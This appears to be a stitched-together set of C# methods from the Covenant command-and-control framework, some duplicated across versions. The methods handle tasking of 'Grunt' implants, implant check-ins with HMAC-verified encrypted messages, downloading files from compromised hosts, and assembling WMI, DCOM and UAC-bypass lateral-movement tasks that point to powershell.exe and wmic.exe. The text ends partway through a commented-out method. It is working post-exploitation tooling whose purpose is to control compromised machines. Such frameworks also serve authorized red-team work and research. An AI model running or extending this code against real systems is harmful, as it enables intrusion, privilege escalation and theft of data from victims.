public async Task <string> Disconnect(Grunt grunt, GruntCommand command, List <ParsedParameter> parameters)
{
string Name = "Disconnect";
StringBuilder toPrint = new StringBuilder();
if (parameters.Count != 2 || !parameters[0].Value.Equals(Name, StringComparison.OrdinalIgnoreCase))
{
return(EliteConsole.PrintFormattedErrorLine("Usage: Disconnect <grunt_name>"));
}
Grunt disconnectGrunt = await _context.Grunts.FirstOrDefaultAsync(G => G.GUID.Equals(parameters[1].Value, StringComparison.OrdinalIgnoreCase));
if (disconnectGrunt == null)
{
toPrint.Append(EliteConsole.PrintFormattedErrorLine("Invalid GruntName selected: " + parameters[1].Value));
toPrint.Append(EliteConsole.PrintFormattedErrorLine("Usage: Disconnect <grunt_name>"));
return(toPrint.ToString());
}
List <string> childrenGruntGuids = grunt.Children.ToList();
if (!childrenGruntGuids.Contains(disconnectGrunt.GUID, StringComparer.OrdinalIgnoreCase))
{
toPrint.Append(EliteConsole.PrintFormattedErrorLine("Grunt: \"" + parameters[1].Value + "\" is not a child Grunt"));
toPrint.Append(EliteConsole.PrintFormattedErrorLine("Usage: Disconnect <grunt_name>"));
return(toPrint.ToString());
}
GruntTask disconnectTask = await _context.GetGruntTaskByName("Disconnect");
await _context.CreateGruntTasking(new GruntTasking
{
Id = 0,
GruntId = grunt.Id,
GruntTaskId = disconnectTask.Id,
GruntTask = disconnectTask,
Name = Guid.NewGuid().ToString().Replace("-", "").Substring(0, 10),
Status = GruntTaskingStatus.Uninitialized,
Type = GruntTaskingType.Disconnect,
Parameters = new List <string> {
disconnectGrunt.GUID
},
GruntCommand = command,
GruntCommandId = command.Id
});
return(toPrint.ToString());
}
public async Task <IActionResult> Create(GruntTaskModel taskModel)
{
try
{
GruntTask task = new GruntTask
{
Name = taskModel.Name,
Description = taskModel.Description,
Help = taskModel.Help,
Code = taskModel.Code,
UnsafeCompile = taskModel.UnsafeCompile,
TokenTask = taskModel.TokenTask,
Options = taskModel.Options
};
taskModel.ReferenceSourceLibraries.ForEach(async RSL => {
task.Add(await _context.GetReferenceSourceLibrary(RSL));
});
taskModel.ReferenceAssemblies.ForEach(async RA => {
task.Add(await _context.GetReferenceAssembly(RA));
});
taskModel.EmbeddedResources.ForEach(async ER => {
task.Add(await _context.GetEmbeddedResource(ER));
});
ViewBag.ReferenceSourceLibraries = await _context.GetReferenceSourceLibraries();
ViewBag.ReferenceAssemblies = await _context.GetReferenceAssemblies();
ViewBag.EmbeddedResources = await _context.GetEmbeddedResources();
GruntTask createdTask = await _context.CreateGruntTask(task);
return(RedirectToAction(nameof(Edit), new { Id = createdTask.Id }));
}
catch (Exception e) when(e is ControllerNotFoundException || e is ControllerBadRequestException || e is ControllerUnauthorizedException)
{
ViewBag.ReferenceSourceLibraries = await _context.GetReferenceSourceLibraries();
ViewBag.ReferenceAssemblies = await _context.GetReferenceAssemblies();
ViewBag.EmbeddedResources = await _context.GetEmbeddedResources();
return(View(new GruntTask()));
}
}
public ActionResult <string> Get()
{
this.SetHeaders();
string cookie = this.GetCookie();
API.Models.Grunt gruntModel = this.CovenantClient.ApiGruntsGet().FirstOrDefault(G => G.CookieAuthKey == cookie);
if (gruntModel == null || gruntModel.Status != GruntStatus.Active)
{
// Invalid CookieAuthKey. May not be legitimate Grunt request, respond NotFound
return(NotFound());
}
gruntModel.LastCheckIn = DateTime.Now.ToString();
CovenantClient.ApiGruntsPut(gruntModel);
GruntTasking gruntTasking = CovenantClient.ApiGruntsByIdTaskingsGet(gruntModel.Id ?? default).FirstOrDefault(GT => GT.Status == GruntTaskingStatus.Uninitialized);
if (gruntTasking == null)
{
// No GruntTasking assigned. Respond with empty template,
return(Ok(this.GetGetEmptyResponse()));
}
if (gruntTasking.Type == GruntTaskingType.Assembly)
{
GruntTask task = CovenantClient.ApiGruntTasksByIdGet(gruntTasking.TaskId ?? default);
if (task == null)
{
// Can't find corresponding task. Should never reach this point. Will just respond NotFound.
return(NotFound());
}
}
gruntTasking.Status = GruntTaskingStatus.Tasked;
CovenantClient.ApiGruntsByIdTaskingsByTasknamePut(gruntTasking.GruntId ?? default, gruntTasking.Name, gruntTasking);
string responseTasking = JsonConvert.SerializeObject(gruntTasking.TaskingMessage);
var message = Covenant.Models.Grunts.GruntEncryptedMessage.Create(
Covenant.Models.Grunts.Grunt.Create(gruntModel),
Common.CovenantEncoding.GetBytes(responseTasking)
);
// Transform response
string transformed = this.Profile.Transform(Common.CovenantEncoding.GetBytes(JsonConvert.SerializeObject(message)));
// Format transformed response
string response = String.Format(this.Profile.HttpPostResponse, transformed);
return(Ok(response));
}
public override bool ValidateMenuParameters(string[] parameters, bool forwardEntrance = true)
{
try
{
if (forwardEntrance)
{
if (parameters.Length != 1)
{
EliteConsole.PrintFormattedErrorLine("Must specify a Task Name.");
EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>");
return(false);
}
GruntTask gruntTask = this.CovenantClient.ApiGrunttasksByTasknameGet(parameters[0]);
if (gruntTask == null)
{
EliteConsole.PrintFormattedErrorLine("Specified invalid Task Name: " + parameters[0]);
EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>");
return(false);
}
this.Task = gruntTask;
this.MenuTitle = this.Task.Name;
}
MenuCommand setCommand = GetTaskMenuSetCommand(this.Task.Name, CovenantClient);
setCommand.Parameters.FirstOrDefault(P => P.Name == "Option").Values = this.Task.Options
.Select(TO => new MenuCommandParameterValue {
Value = TO.Name
})
.ToList();
this.AdditionalOptions[AdditionalOptions.IndexOf(
this.AdditionalOptions.FirstOrDefault(MC => MC.Name == "Set")
)] = setCommand;
AdditionalOptions[AdditionalOptions.IndexOf(
this.AdditionalOptions.FirstOrDefault(MC => MC.Name == "Unset")
)] = new MenuCommandGenericUnset(setCommand.Parameters.FirstOrDefault(P => P.Name == "Option").Values);
this.Refresh();
}
catch (HttpOperationException e)
{
EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content);
}
return(true);
}
public override async void Command(MenuItem menuItem, string UserInput)
{
try
{
List <string> commands = UserInput.Split(" ").ToList();
if (commands.Count() < 3 || !commands[0].Equals(this.Name, StringComparison.OrdinalIgnoreCase))
{
menuItem.PrintInvalidOptionError(UserInput);
return;
}
GruntTask task = ((TaskMenuItem)menuItem).Task;
GruntTaskOption option = task.Options.FirstOrDefault(O => O.Name.Equals(commands[1], StringComparison.OrdinalIgnoreCase));
if (commands[1].Equals("LocalFilePath", StringComparison.OrdinalIgnoreCase))
{
string FilePath = Path.Combine(Common.EliteDataFolder, commands[2]);
if (!File.Exists(FilePath))
{
menuItem.PrintInvalidOptionError(UserInput);
EliteConsole.PrintFormattedErrorLine("File: \"" + FilePath + "\" does not exist on the local system.");
return;
}
task.Options.FirstOrDefault(O => O.Name == "FileContents").Value = Convert.ToBase64String(File.ReadAllBytes(FilePath));
task.Options.FirstOrDefault(O => O.Name == "FileName").Value = Path.GetFileName(FilePath);
await this.CovenantClient.ApiGrunttasksPutAsync(task);
}
else if (option == null)
{
menuItem.PrintInvalidOptionError(UserInput);
EliteConsole.PrintFormattedErrorLine("Invalid Set option: \"" + commands[1] + "\"");
return;
}
else
{
option.Value = String.Join(" ", commands.GetRange(2, commands.Count() - 2));
await this.CovenantClient.ApiGrunttasksPutAsync(task);
}
}
catch (HttpOperationException e)
{
EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content);
}
}
public async Task <GruntTask> GetGruntTaskByName(string name, Common.DotNetVersion version = Common.DotNetVersion.Net35)
{
string lower = name.ToLower();
GruntTask task = _context.gruntTasks
.Where(T => T.Name.ToLower() == lower)
// .Where(T => T.CompatibleDotNetVersions.Contains(version))
/*.Include(T => T.Options)
* .Include(T => T.Author)
* .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary")
* .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryReferenceAssemblies.ReferenceAssembly")
* .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryEmbeddedResources.EmbeddedResource")
* .Include("GruntTaskReferenceAssemblies.ReferenceAssembly")
* .Include("GruntTaskEmbeddedResources.EmbeddedResource")*/
.AsEnumerable()
.Where(T => T.CompatibleDotNetVersions.Contains(version))
.FirstOrDefault();
if (task == null)
{
// Probably bad performance here
task = _context.gruntTasks
/*.Include(T => T.Options)
* .Include(T => T.Author)
* .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary")
* .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryReferenceAssemblies.ReferenceAssembly")
* .Include("GruntTaskReferenceSourceLibraries.ReferenceSourceLibrary.ReferenceSourceLibraryEmbeddedResources.EmbeddedResource")
* .Include("GruntTaskReferenceAssemblies.ReferenceAssembly")
* .Include("GruntTaskEmbeddedResources.EmbeddedResource")*/
.AsEnumerable()
.Where(T => T.Aliases.Any(A => A.Equals(lower, StringComparison.CurrentCultureIgnoreCase)))
.Where(T => T.CompatibleDotNetVersions.Contains(version))
.FirstOrDefault();
if (task == null)
{
throw new ControllerNotFoundException($"NotFound - GruntTask with Name: {name}");
}
}
return(await Task.FromResult(task));
}
public override async void Command(MenuItem menuItem, string UserInput)
{
Grunt grunt = ((TaskMenuItem)menuItem).Grunt;
try
{
GruntTask task = ((TaskMenuItem)menuItem).Task;
GruntTasking gruntTasking = new GruntTasking
{
TaskId = task.Id,
GruntId = grunt.Id,
Type = GruntTaskingType.Assembly,
Status = GruntTaskingStatus.Uninitialized,
TokenTask = task.TokenTask,
TaskingCommand = UserInput.ToLower() == "Start" ? (task.Name + " " + String.Join(' ', task.Options.Select(O => "/" + O.Name.ToLower() + " " + O.Value).ToList())) : UserInput
};
await this.CovenantClient.ApiGruntsByIdTaskingsPostAsync(grunt.Id ?? default, gruntTasking);
}
catch (HttpOperationException)
{
EliteConsole.PrintFormattedErrorLine("Failed starting task on Grunt: " + grunt.Name);
}
}
public ActionResult <GruntTask> EditGruntTask(int id, [FromBody] GruntTask task)
{
GruntTask updatingTask = _context.GruntTasks.FirstOrDefault(T => T.Id == id);
if (updatingTask == null || updatingTask.Id != task.Id)
{
return(NotFound());
}
updatingTask.Options = _context.GruntTaskOptions.Where(O => O.TaskId == updatingTask.Id).ToList();
task.Options.ForEach(O =>
{
GruntTask.GruntTaskOption updatingTaskOption = updatingTask.Options.FirstOrDefault(TO => TO.Id == O.Id);
if (updatingTaskOption == null)
{
return;
}
updatingTaskOption.Value = O.Value;
});
_context.GruntTasks.Update(updatingTask);
_context.SaveChanges();
return(Ok(updatingTask));
}
public override bool ValidateMenuParameters(string[] parameters, bool forwardEntrance = true)
{
if (forwardEntrance)
{
if (parameters.Length != 1)
{
EliteConsole.PrintFormattedErrorLine("Must specify a Task Name.");
EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>");
return(false);
}
GruntTask gruntTask = CovenantClient.ApiGruntTasksByTasknameGet(parameters[0]);
if (gruntTask == null)
{
EliteConsole.PrintFormattedErrorLine("Specified invalid Task Name: " + parameters[0]);
EliteConsole.PrintFormattedErrorLine("Usage: Task <task_name>");
return(false);
}
this.task = gruntTask;
this.MenuTitle = this.task.Name;
}
this.Refresh();
return(true);
}
public ActionResult <GruntTasking> CreateGruntTasking(int id, [FromBody] GruntTasking gruntTasking)
{
Grunt grunt = _context.Grunts.FirstOrDefault(G => G.Id == id);
if (grunt == null)
{
return(NotFound($"NotFound - Grunt with id: {id}"));
}
CovenantUser taskingUser = this.GetCurrentUser();
if (taskingUser == null)
{
return(NotFound($"NotFound - CovenantUser"));
}
gruntTasking.TaskingUser = taskingUser.UserName;
gruntTasking.TaskingTime = DateTime.UtcNow;
if (gruntTasking.Type == GruntTaskingType.Assembly)
{
GruntTask task = _context.GruntTasks.Include(T => T.Options).FirstOrDefault(T => T.Id == gruntTasking.TaskId);
if (task == null)
{
return(NotFound($"NotFound - GruntTask with id: {gruntTasking.TaskId}"));
}
List <string> parameters = task.Options.Select(O => O.Value).ToList();
if (task.Name.ToLower() == "wmigrunt")
{
Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[1].ToLower());
if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
{
return(NotFound($"NotFound - Launcher with name: {parameters[1]}"));
}
else
{
parameters[1] = l.LauncherString;
}
}
else if (task.Name.ToLower() == "dcomgrunt")
{
Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[1].ToLower());
if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
{
return(NotFound($"NotFound - Launcher with name: {parameters[1]}"));
}
else
{
// Add .exe exetension if needed
List <string> split = l.LauncherString.Split(" ").ToList();
parameters[1] = split.FirstOrDefault();
if (!parameters[1].EndsWith(".exe", StringComparison.OrdinalIgnoreCase))
{
parameters[1] += ".exe";
}
// Add command parameters
split.RemoveAt(0);
parameters.Insert(2, String.Join(" ", split.ToArray()));
string Directory = "C:\\WINDOWS\\System32\\";
if (parameters[1].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[1].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "wbem\\";
}
parameters.Insert(3, Directory);
}
}
else if (task.Name.ToLower() == "dcomcommand")
{
// Add .exe exetension if needed
List <string> split = parameters[1].Split(" ").ToList();
parameters[1] = split[0];
if (!parameters[1].EndsWith(".exe", StringComparison.OrdinalIgnoreCase))
{
parameters[1] += ".exe";
}
// Add command parameters
split.RemoveAt(0);
parameters.Insert(2, String.Join(" ", split.ToArray()));
string Directory = "C:\\WINDOWS\\System32\\";
if (parameters[1].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[1].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "wbem\\";
}
parameters.Insert(3, Directory);
}
else if (task.Name.ToLower() == "bypassuacgrunt")
{
Launcher l = _context.Launchers.FirstOrDefault(L => L.Name.ToLower() == parameters[0].ToLower());
if (l == null || l.LauncherString == null || l.LauncherString.Trim() == "")
{
return(NotFound($"NotFound - Launcher with name: {parameters[0]}"));
}
else
{
// Add .exe exetension if needed
string[] split = l.LauncherString.Split(" ");
if (!parameters[0].EndsWith(".exe", StringComparison.OrdinalIgnoreCase))
{
parameters[0] += ".exe";
}
// Add parameters need for BypassUAC Task
string ArgParams = String.Join(" ", split.ToList().GetRange(1, split.Count() - 1));
string Directory = "C:\\WINDOWS\\System32\\";
if (parameters[0].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[0].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "wbem\\";
}
parameters.Add(ArgParams);
parameters.Add(Directory);
parameters.Add("0");
}
}
else if (task.Name.ToLower() == "bypassuaccommand")
{
// Add .exe exetension if needed
string[] split = parameters[0].Split(" ");
if (!parameters[0].EndsWith(".exe", StringComparison.OrdinalIgnoreCase))
{
parameters[0] += ".exe";
}
// Add parameters need for BypassUAC Task
string ArgParams = String.Join(" ", split.ToList().GetRange(1, split.Count() - 1));
string Directory = "C:\\WINDOWS\\System32\\";
if (parameters[0].Equals("powershell.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "WindowsPowerShell\\v1.0\\";
}
else if (parameters[0].Equals("wmic.exe", StringComparison.OrdinalIgnoreCase))
{
Directory += "wbem\\";
}
parameters.Add(ArgParams);
parameters.Add(Directory);
parameters.Add("0");
}
try
{
gruntTasking.Compile(task, grunt, parameters);
}
catch (Exception e)
{
Console.Error.WriteLine("Task Compilation failed: " + e.Message + e.StackTrace);
return(BadRequest("Task returned compilation errors:" + e.Message + e.StackTrace));
}
}
else if (gruntTasking.Type == GruntTaskingType.Connect)
{
string hostname = gruntTasking.GruntTaskingMessage.Message.Split(",")[0];
string pipename = gruntTasking.GruntTaskingMessage.Message.Split(",")[1];
if (hostname == "localhost" || hostname == "127.0.0.1")
{
hostname = grunt.Hostname;
}
gruntTasking.TaskingMessage = hostname + "," + pipename;
}
_context.GruntTaskings.Add(gruntTasking);
_context.Events.Add(new Event
{
Time = gruntTasking.TaskingTime,
MessageHeader = "[" + gruntTasking.TaskingTime + " UTC] Grunt: " + grunt.Name + " has " + "been assigned GruntTasking: " + gruntTasking.Name,
MessageBody = "(" + gruntTasking.TaskingUser + ") > " + gruntTasking.TaskingCommand,
Level = Event.EventLevel.Highlight,
Context = grunt.Name
});
_context.SaveChanges();
return(CreatedAtRoute(nameof(GetGruntTasking), new { id = id, tid = gruntTasking.Id }, gruntTasking));
}
public void Add(GruntTask entity)
{
gruntTasks.Add(entity);
}
public Task <GruntTask> EditGruntTask(GruntTask task)
{
return(_connection.InvokeAsync <GruntTask>("EditGruntTask", task));
}
public Task <GruntTask> CreateGruntTask(GruntTask task)
{
return(_connection.InvokeAsync <GruntTask>("CreateGruntTask", task));
}
public Task <string> ParseParametersIntoTask(GruntTask task, List <ParsedParameter> parameters)
{
return(_connection.InvokeAsync <string>("ParseParametersIntoTask", task, parameters));
}
public async Task <GruntTask> CreateGruntTask(GruntTask task)
{
//Need to consider restructuring this method and the context class
//The way it is currently done is built around interacting with a sqllite db.
//need to decide if the Empire server will manage the DB directly.
List <GruntTaskOption> options = task.Options.ToList();
List <EmbeddedResource> resources = task.EmbeddedResources.ToList();
List <ReferenceAssembly> assemblies = task.ReferenceAssemblies.ToList();
List <ReferenceSourceLibrary> libraries = task.ReferenceSourceLibraries.ToList();
task.Options = new List <GruntTaskOption>();
task.EmbeddedResources.ForEach(ER => task.Remove(ER));
task.ReferenceAssemblies.ForEach(RA => task.Remove(RA));
task.ReferenceSourceLibraries.ForEach(RSL => task.Remove(RSL));
task.Id = _context.GetNextTaskID();
foreach (GruntTaskOption option in options)
{
option.GruntTaskId = task.Id;
//since the option is being added to the task not sure the options need to be stored separately
//this was a structure done for the covenant Db
_context.Add(option);
task.Options.Add(option);
}
foreach (EmbeddedResource resource in resources)
{
await this.CreateEntities(
new GruntTaskEmbeddedResource
{
EmbeddedResource = await this.GetEmbeddedResourceByName(resource.Name),
GruntTask = task
}
);
task.Add(resource);
}
foreach (ReferenceAssembly assembly in assemblies)
{
//This is all Database schema based so doesn't work without the databasse
await this.CreateEntities(
new GruntTaskReferenceAssembly
{
ReferenceAssembly = await this.GetReferenceAssemblyByName(assembly.Name, assembly.DotNetVersion),
GruntTask = task
}
);
//instead do this
task.Add(assembly);
}
foreach (ReferenceSourceLibrary library in libraries)
{
/* await this.CreateEntities(
* new GruntTaskReferenceSourceLibrary
* {
* ReferenceSourceLibrary = await this.GetReferenceSourceLibraryByName(library.Name),
* GruntTask = task
* }
* );*/
task.Add(library);
}
//add the Grunt task to teh context list
_context.Add(task);
// _notifier.OnCreateGruntTask(this, task);
return(await this.GetGruntTask(task.Id));
}
// post task
private ActionResult PostTask(Covenant.Models.Grunts.GruntEncryptedMessage outputMessage)
{
string cookie = this.GetCookie();
API.Models.Grunt gruntModel = this.CovenantClient.ApiGruntsGet().FirstOrDefault(G => G.CookieAuthKey == cookie);
if (gruntModel == null || gruntModel.Status != GruntStatus.Active)
{
// Invalid CookieAuthKey. May not be legitimate Grunt request, respond NotFound
return(NotFound());
}
string TaskName = outputMessage.Meta;
GruntTasking gruntTasking = CovenantClient.ApiGruntsByIdTaskingsByTasknameGet(gruntModel.Id ?? default, TaskName);
if (gruntTasking == null || gruntModel.Id != gruntTasking.GruntId)
{
// Invalid taskname. May not be legitimate Grunt request, respond NotFound
return(NotFound());
}
var realGrunt = Covenant.Models.Grunts.Grunt.Create(gruntModel);
if (realGrunt == null || realGrunt.Status != Covenant.Models.Grunts.Grunt.GruntStatus.Active)
{
// Invalid Grunt. May not be legitimate Grunt request, respond NotFound
return(NotFound());
}
if (!outputMessage.VerifyHMAC(Convert.FromBase64String(realGrunt.GruntNegotiatedSessionKey)))
{
// Invalid signature. Almost certainly not a legitimate Grunt request, responsd NotFound
return(NotFound());
}
string taskOutput = Common.CovenantEncoding.GetString(realGrunt.SessionDecrypt(outputMessage));
gruntTasking.GruntTaskOutput = taskOutput;
gruntTasking.Status = GruntTaskingStatus.Completed;
if (gruntTasking.Type == GruntTaskingType.Kill)
{
gruntModel.Status = GruntStatus.Killed;
CovenantClient.ApiGruntsPut(gruntModel);
}
CovenantClient.ApiGruntsByIdTaskingsByTasknamePut(gruntTasking.GruntId ?? default, gruntTasking.Name, gruntTasking);
GruntTask DownloadTask = CovenantClient.ApiGruntTasksGet().FirstOrDefault(GT => GT.Name == "Download");
if (gruntTasking.TaskId == DownloadTask.Id)
{
CovenantClient.ApiEventsPost(new EventModel
{
Message = "Grunt: " + realGrunt.Name + " has completed GruntTasking: " + gruntTasking.Name,
Level = EventLevel.Highlight,
Context = realGrunt.Name
});
string FileName = Common.CovenantEncoding.GetString(Convert.FromBase64String(gruntTasking.GruntTaskingAssembly.Split(",")[1]));
CovenantClient.ApiEventsDownloadPost(new DownloadEvent
{
Message = "Downloaded: " + FileName + "\r\n" + "Syncing to Elite...",
Level = EventLevel.Info,
Context = realGrunt.Name,
FileName = FileName,
FileContents = gruntTasking.GruntTaskOutput,
Progress = DownloadProgress.Complete
});
}
else
{
CovenantClient.ApiEventsPost(new EventModel
{
Message = "Grunt: " + realGrunt.Name + " has completed GruntTasking: " + gruntTasking.Name,
Level = EventLevel.Highlight,
Context = realGrunt.Name
});
CovenantClient.ApiEventsPost(new EventModel
{
Message = gruntTasking.GruntTaskOutput,
Level = EventLevel.Info,
Context = realGrunt.Name
});
}
return(Ok());
}
public override void Command(MenuItem menuItem, string UserInput)
{
try
{
menuItem.Refresh();
GruntTask task = ((TaskMenuItem)menuItem).Task;
EliteConsoleMenu menu = new EliteConsoleMenu(EliteConsoleMenu.EliteConsoleMenuType.Parameter, "Task: " + task.Name)
{
ShouldShortenFields = false
};
menu.Rows.Add(new List <string> {
"Name:", task.Name
});
menu.Rows.Add(new List <string> {
"Description:", task.Description
});
if (task.ReferenceAssemblies.Any())
{
menu.Rows.Add(new List <string> {
"ReferenceAssemblies:", String.Join(",", task.ReferenceAssemblies)
});
}
if (task.ReferenceSourceLibraries.Any())
{
menu.Rows.Add(new List <string> {
"ReferenceSourceLibraries:", String.Join(",", task.ReferenceSourceLibraries)
});
}
if (task.EmbeddedResources.Any())
{
menu.Rows.Add(new List <string> {
"EmbeddedResources:", String.Join(",", task.EmbeddedResources)
});
}
// string usage = "Usage: " + task.Name;
// foreach (GruntTaskOption o in task.Options)
// {
// usage += " <" + o.Name.ToLower() + ">";
// }
// menu.Rows.Add(new List<string> { "Usage:", usage });
if (task.Options.Any())
{
foreach (GruntTaskOption o in task.Options)
{
menu.Rows.Add(new List <string> {
"Parameter:"
});
menu.Rows.Add(new List <string> {
" Name:", o.Name
});
menu.Rows.Add(new List <string> {
" Description:", o.Description
});
menu.Rows.Add(new List <string> {
" Value:", o.Value
});
}
}
menu.Print();
}
catch (HttpOperationException e)
{
EliteConsole.PrintFormattedWarningLine("CovenantException: " + e.Response.Content);
}
}
public async Task <GruntCommand> Input(CovenantUser user, Grunt grunt, string UserInput)
{
GruntCommand GruntCommand = await _context.CreateGruntCommand(new GruntCommand
{
Command = GetCommandFromInput(UserInput),
CommandTime = DateTime.UtcNow,
User = user,
GruntId = grunt.Id,
Grunt = grunt,
CommandOutputId = 0,
CommandOutput = new CommandOutput()
}, _grunthub, _eventhub);
List <ParsedParameter> parameters = ParseParameters(UserInput).ToList();
GruntTask commandTask = null;
try
{
commandTask = await _context.GetGruntTaskByName(parameters.FirstOrDefault().Value);
if (commandTask.Options.Count == 1 && new List <string> {
"Command", "ShellCommand", "PowerShellCommand", "Code"
}.Contains(commandTask.Options[0].Name))
{
parameters = new List <ParsedParameter>
{
new ParsedParameter
{
Value = commandTask.Name, Label = "", IsLabeled = false, Position = 0
},
new ParsedParameter
{
Value = UserInput.Substring(UserInput.IndexOf(" ", StringComparison.Ordinal) + 1).Trim('"'),
Label = "", IsLabeled = false, Position = 0
}
};
}
}
catch (ControllerNotFoundException) { }
string output = "";
if (parameters.FirstOrDefault().Value.ToLower() == "show")
{
output = await Show(grunt);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "help")
{
output = await Help(parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "sharpshell")
{
output = await SharpShell(grunt, GruntCommand, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "kill")
{
output = await Kill(grunt, GruntCommand, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "set")
{
output = await Set(grunt, GruntCommand, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "history")
{
output = await History(grunt, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "connect")
{
output = await Connect(grunt, GruntCommand, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "disconnect")
{
output = await Disconnect(grunt, GruntCommand, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "jobs")
{
output = await Jobs(grunt, GruntCommand, parameters);
}
else if (parameters.FirstOrDefault().Value.ToLower() == "note")
{
grunt.Note = string.Join(" ", parameters.Skip(1).Select(P => P.Value).ToArray());
await _context.EditGrunt(grunt, user, _grunthub, _eventhub);
output = "Note: " + grunt.Note;
}
else if (parameters.FirstOrDefault().Value.ToLower() == "powershellimport")
{
grunt.PowerShellImport = parameters.Count >= 2 ? parameters[1].Value : "";
await _context.EditGrunt(grunt, user, _grunthub, _eventhub);
output = "PowerShell Imported";
}
else if (commandTask != null)
{
parameters = parameters.Skip(1).ToList();
if (parameters.Count() < commandTask.Options.Count(O => !O.Optional))
{
_context.Entry(GruntCommand).State = EntityState.Detached;
GruntCommand.CommandOutput.Output = EliteConsole.PrintFormattedErrorLine(GetUsage(commandTask));
return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub));
}
// All options begin unassigned
List <bool> OptionAssignments = commandTask.Options.Select(O => false).ToList();
commandTask.Options.ForEach(O => O.Value = "");
for (int i = 0; i < parameters.Count; i++)
{
if (parameters[i].IsLabeled)
{
var option = commandTask.Options.FirstOrDefault(O => O.Name.Equals(parameters[i].Label, StringComparison.OrdinalIgnoreCase));
option.Value = parameters[i].Value;
OptionAssignments[commandTask.Options.IndexOf(option)] = true;
}
else
{
GruntTaskOption nextOption = null;
// Find next unassigned option
for (int j = 0; j < commandTask.Options.Count; j++)
{
if (!OptionAssignments[j])
{
nextOption = commandTask.Options[j];
OptionAssignments[j] = true;
break;
}
}
if (nextOption == null)
{
// This is an extra parameter
_context.Entry(GruntCommand).State = EntityState.Detached;
GruntCommand.CommandOutput.Output = EliteConsole.PrintFormattedErrorLine(GetUsage(commandTask));
return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub));
}
nextOption.Value = parameters[i].Value;
}
}
// Check for unassigned required options
for (int i = 0; i < commandTask.Options.Count; i++)
{
if (!OptionAssignments[i] && !commandTask.Options[i].Optional)
{
// This is an extra parameter
StringBuilder toPrint = new StringBuilder();
toPrint.Append(EliteConsole.PrintFormattedErrorLine(commandTask.Options[i].Name + " is required."));
toPrint.Append(EliteConsole.PrintFormattedErrorLine(GetUsage(commandTask)));
_context.Entry(GruntCommand).State = EntityState.Detached;
GruntCommand.CommandOutput.Output = toPrint.ToString();
return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub));
}
}
// Parameters have parsed successfully
commandTask = await _context.EditGruntTask(commandTask);
await StartTask(grunt, commandTask, GruntCommand);
}
else
{
output = EliteConsole.PrintFormattedErrorLine("Unrecognized command");
}
_context.Entry(GruntCommand).State = EntityState.Detached;
GruntCommand.CommandOutput.Output = output;
return(await _context.EditGruntCommand(GruntCommand, _grunthub, _eventhub));
}
public void Update(GruntTask entity)
{
gruntTasks[gruntTasks.FindIndex(ind => ind.Name == entity.Name)] = entity;
}
public async Task <GruntTask> EditGruntTask(GruntTask task)
{
/*GruntTask updatingTask = await this.GetGruntTask(task.Id);
* updatingTask.Name = task.Name;
* updatingTask.Description = task.Description;
* updatingTask.Help = task.Help;
* updatingTask.Aliases = task.Aliases;
* if (updatingTask.Code != task.Code)
* {
* updatingTask.Code = task.Code;
* updatingTask.Compiled = false;
* }
* else
* {
* updatingTask.Compiled = task.Compiled;
* }
* updatingTask.UnsafeCompile = task.UnsafeCompile;
* updatingTask.TokenTask = task.TokenTask;
* updatingTask.TaskingType = task.TaskingType;
*
* task.Options.Where(O => O.Id == 0).ToList().ForEach(async O => await this.CreateGruntTaskOption(O));
* var removeOptions = updatingTask.Options.Select(UT => UT.Id).Except(task.Options.Select(O => O.Id));
* removeOptions.ToList().ForEach(RO => updatingTask.Options.Remove(updatingTask.Options.FirstOrDefault(UO => UO.Id == RO)));
* foreach (var option in updatingTask.Options)
* {
* var newOption = task.Options.FirstOrDefault(T => T.Id == option.Id);
* if (newOption != null)
* {
* option.Name = newOption.Name;
* option.Description = newOption.Description;
* option.Value = newOption.Value;
* option.SuggestedValues = newOption.SuggestedValues;
* option.Optional = newOption.Optional;
* option.DisplayInCommand = newOption.DisplayInCommand;
* }
* }
*
* var removeAssemblies = updatingTask.ReferenceAssemblies.Select(MRA => MRA.Id).Except(task.ReferenceAssemblies.Select(RA => RA.Id));
* var addAssemblies = task.ReferenceAssemblies.Select(MRA => MRA.Id).Except(updatingTask.ReferenceAssemblies.Select(MRA => MRA.Id));
* removeAssemblies.ToList().ForEach(async RA => updatingTask.Remove(await this.GetReferenceAssembly(RA)));
* addAssemblies.ToList().ForEach(async AA => updatingTask.Add(await this.GetReferenceAssembly(AA)));
*
